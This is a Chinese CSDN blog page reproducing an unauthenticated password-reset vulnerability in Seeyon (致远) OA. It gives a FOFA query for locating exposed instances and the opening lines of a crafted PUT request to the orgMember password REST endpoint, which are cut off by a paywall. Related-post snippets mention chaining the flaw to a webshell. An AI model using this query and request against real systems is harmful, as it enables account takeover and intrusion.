致远OA ucpclogin 任意密码重置

最新推荐文章于 2024-07-25 13:44:24 发布

今天晚上早睡觉

最新推荐文章于 2024-07-25 13:44:24 发布

阅读量602

点赞数

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136606002

版权

漏洞复现专栏收录该内容

360 篇文章 156 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

致远OA办公自动化软件存在一个未授权密码重置漏洞，攻击者仅需用户名即可构造请求修改用户密码，从而获取系统后台访问权限，可能导致远程代码执行。影响范围包括特定版本。漏洞复现涉及构造PUT数据包并使用审计管理员账号操作。

摘要由CSDN通过智能技术生成

简介

致远OA是北京致远互联软件股份有限公司开发的一套办公自动化软件。

漏洞描述

致远OA 存在密码重置漏洞，未授权的攻击者在知道用户名的情况下，可以构造特制的请求包，从而修改用户密码，登录系统后台。攻击者可以利用此漏洞修改任意账号的密码，进而登录系统并获取密码被修改账号的访问权限，进一步的利用后台接口可以导致远程代码执行。

影响版本

致远OA
Fofa：

app="致远互联-OA"

漏洞复现

使用以下构造的PUT数据包重置用户密码

PUT /seeyon/rest/orgMember/-4401606663639775639/password/genericController.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept:

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
致远OA ucpclogin 任意密码重置

致远OA ucpclogin 任意密码重置
复制链接

扫一扫

专栏目录

订阅专栏

致远OA V8.1 数据字典

06-16

致远OA V8.1 数据字典

致远OA破解思路，致远协同办公OA破解思路

SSSU的专栏

04-08

3555

致远OA二次开发，致远OA客开、致远OA破解思路，致远协同办公OA破解思路、NCC破解、中间件破解、金蝶破解、东方通破解

参与评论您还未登录，请先登录后发表或查看评论

[漏洞合集]致远获取后台权限及权限绕过漏洞大合集

最新发布

LiangYueSec的博客

07-25

2030

[漏洞合集]致远获取后台权限及权限绕过漏洞大合集

致远OA ucpcLogin密码重置（可组合拳GetShell）

holyxp的博客

03-31

2319

2023 致远OA-任意用户密码重置漏洞

weixin_45908624的博客

09-14

2814

致远OA 短信验证码绕过重置密码漏洞

致远OA管理员密码的重置

致远OA的博客

08-25

9439

管理员账号忘记了，然后致远OA的运维服务也到期了，怎么办？求人不如求自己，我们来看看到底怎么修改相关的管理员密码吧。注意一：更新后需要重启OA应用方可生效。注意二：更新后的密码是OA系统预设密码。注意三：如果OA设置了密码等级为中等或以上，在修改后的首次登陆需要强制修改密码 system系统管理员（默认密码：system，对应A8的系统管理员、A6的单位管理员），SQL如下： UPDATE ORG_PRINCIPAL SET CREDENTIAL_VALUE='L0tEW5Yk+c

致远OA_ucpcLogin密码重置_后台可getshell

qq_39342001的博客

04-03

1094

登录后台后，可利用通过ZipSlip漏洞getshell。需要的朋友可以去看相关的文章。接口时，所有的action都不需要登录，这就实现前台修改管理员密码。方法中进行验证，所以只需要普通用户的权限就可以修改管理员的密码。该漏洞是对rest接口重置密码漏洞补丁权限的绕过。值都是固定的，正常情况下，我们可以通过。致远中存在一些自带的用户，这些用户的。为我们需要修改的密码，当把密码写成。的特征，分别有7种权限校验的方法。而rest接口修改密码的路由为。的时候，那么就会进入到。

【漏洞复现】致远OA ucpclogin 任意密码重置漏洞

qq_67810151的博客

03-07

1549

致远OA 存在密码重置漏洞，未授权的攻击者在知道用户名的情况下，可以构造特制的请求包，从而修改用户密码，登录系统后台。

致远OA ucpcLogin密码重置

weixin_43167326的博客

03-26

754

致远OA是一款协同管理平台，主要面向中大型、集团型企业和组织的协同管理软件产品。产品聚焦企业"智慧流程、业务定制、统一门户、移动办公、应用集成、数字决策"六大核心需求，同时具备智能化、平台化、移动化、定制化、数字化五大特性。

【漏洞复现】致远OA前台任意用户密码重置漏洞

TT小子的博客

09-13

112

简介致远OA是一款协同管理平台，主要面向中大型、集团型企业和组织的协同管理软件产品。产品聚焦企业"智慧流程、业务定制、统一门户、移动办公、应用集成、数字决策"六大核心需求，同时具备智能化、平台化、移动化、定制化、数字化五大特性。漏洞描述致远官方发布了短信验证码绕过重置密码漏洞的补丁公告，未经授权的远程攻击者在获取到用户名的情况下即可通过发送HTTP请求来触发任意用户密码重置，最终可导致任意...

致远OA 6.1SP1 数据字典

11-11

致远OA 数据字典 6.1SP1 致远OA数据维护致远OA 数据字典 6.1SP1 致远OA数据维护

致远OA任意文件下载1

08-08

致远OA任意文件下载漏洞致远OA是一款由北京致远互联软件股份有限公司研发的办公系统，旨在为企业提供一站式的办公解决方案。然而，在致远OA的webmail.do文件中存在一个任意文件下载漏洞，攻击者可以通过修改...

致远OA协同手写控件及pdf控件

07-29

致远OA协同手写控件及pdf控件，下载后，解压缩，关闭IE 和 office软件（word，excel等），运行 setup，以管理员身份运行。

致远OA V5.6数据字典

08-26

【致远OA V5.6数据字典】是企业信息化管理中重要的参考资料，它详细记录了致远OA V5.6版本中所有数据库表、字段及其含义，为系统的配置、维护和开发提供了基础数据支持。数据字典在信息系统设计、数据库管理和数据...

【漏洞复现】QVD-2023-21704致远oa前台密码修改

qq_34914659的博客

09-12

2223

QVD-2023-21704致远oa前台密码修改

java base64获取文件名_致远 OA 变种 BASE64 算法的加解密方法

weixin_31464715的博客

12-08

1292

作者：kk本文为作者投稿，Seebug Paper 期待你的分享，凡经采用即有礼品相送！投稿邮箱：paper@seebug.org 在几天前，我就收到致远OA的RCE漏洞部分详情，但是并没有引起重视。当时获得的POC部分只包括了任意文件上传的数据包，但并没有其余详情，且数据包中重要数据都被编码过了。原以为又是一次恶作剧。没想到啊。由于漏洞本身没什么好讲的，现在让我们来看看这个POC中涉及的编码...

linux 调用rest接口,REST调用

weixin_39776298的博客

05-15

857

1. 概述与SOAP相比，REST WebService简化了调用，也降低了技能要求。REST 近年来已经成为最主要的 Web 服务设计模式。事实上，REST 对 Web 的影响非常大，由于其使用相当方便，已经普遍地取代了基于 SOAP 和 WSDL 的接口设计。您可以不用知道REST是什么，按照我们的手册发起HTTP请求即可，只需遵从以下的基本原则1 REST用URL来描述资源，如人员、部门、...

致远OA任意管理员登陆漏洞分析

swordheart的博客

07-08

4026

随着中国最大的安全产品性能检测以及人体体能极限挑战活动的到来，各路大佬都八仙过海各显神通。同时大量的0day被公开，排除那些被辟谣的，还有很多值得学习的漏洞。致远这是个组合漏洞，首先任意管理员登陆，然后后台getshell。因为前台漏洞相对来说危害较高，这里着重分析下前台这个漏洞。致远oa使用spring的自动装配，通过在xml文件中搜索漏洞url中的，可以快速定位到漏洞类。根据exp找到存在问题的方法。找到该方法后基本上可以一眼看到漏洞点了，在该方法的最下方，这里的memberId是可控的。首先通过

致远oa wpsassistservlet 任意文件读取漏洞

12-27

致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞，攻击者可以利用该漏洞来读取系统中的任意文件，包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息，危害系统安全。这个漏洞存在的根本原因可能是在致远oa wpsassistservlet中对用户输入的数据没有进行充分的验证和过滤，导致攻击者可以构造恶意请求，获取系统文件的内容。一旦攻击者成功利用这个漏洞，就可能对系统进行攻击，损害系统的安全性。针对致远oa wpsassistservlet 任意文件读取漏洞，我们可以采取一些措施来加强系统的安全性。首先，及时更新系统补丁，确保系统能够及时修复这个漏洞。其次，加强对用户输入数据的验证和过滤，限制用户的输入范围，避免攻击者利用恶意输入来进行攻击。另外，加强系统的监控和审计功能，及时发现异常行为，并进行处理。总的来说，致远oa wpsassistservlet 任意文件读取漏洞是一种严重的安全隐患，需要引起相关部门的重视，采取必要的措施来确保系统的安全性。只有不断加强系统的安全防护措施，及时修复存在的漏洞，才能有效地提升系统的安全性。